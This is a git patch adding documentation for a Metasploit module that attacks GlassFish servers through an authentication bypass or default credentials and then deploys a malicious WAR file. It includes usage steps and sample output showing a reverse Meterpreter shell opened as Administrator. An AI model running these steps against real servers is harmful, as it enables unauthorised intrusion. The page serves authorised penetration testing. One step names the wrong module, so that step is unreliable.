From 8ad61a11c881a761e92f2d4ac662306410dfec19 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Mon, 27 Mar 2017 19:23:39 +0530 Subject: [PATCH] Documentation on glassfish_deployer --- .../exploit/multi/http/glassfish_deployer.md | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/glassfish_deployer.md diff --git a/documentation/modules/exploit/multi/http/glassfish_deployer.md b/documentation/modules/exploit/multi/http/glassfish_deployer.md new file mode 100644 index 0000000000..c749296554 --- /dev/null +++ b/documentation/modules/exploit/multi/http/glassfish_deployer.md @@ -0,0 +1,51 @@ +##Description + +This module logs in to an GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation. + +## GlassFish + +GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception. + +## Verification Steps + +1. Do: ```use exploit/multi/http/axis2_deployer``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set USERNAME [Username]``` +4. Do: ```set PASSWORD [Password]``` +5. Do: ```run``` + +##Sample Output + +``` +msf > use exploit/multi/http/glassfish_deployer +msf exploit(glassfish_deployer) > set RHOST 172.16.182.237 +RHOST => 172.16.182.237 +msf exploit(glassfish_deployer) > set USERNAME admin +USERNAME => admin +msf exploit(glassfish_deployer) > set PASSWORD admin123 +PASSWORD => admin123 +msf exploit(glassfish_deployer) > exploit +[*] Started reverse TCP handler on 172.16.182.112:4444 +[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1 +[*] Trying GlassFish authentication bypass.. +[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass +[*] Uploading payload... +[*] Successfully uploaded +[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp... +[*] Sending stage (30355 bytes) to 172.16.182.237 +[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500 +[*] Getting information to undeploy... +[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES... +[*] Undeployment complete. + +meterpreter > getuid +Server username: Administrator +meterpreter > sysinfo +Computer : juan-6ed9db6ca8 +OS : Windows 2003 5.2 (x86) +Meterpreter : java/java +meterpreter > exit +[*] Shutting down Meterpreter... + + +```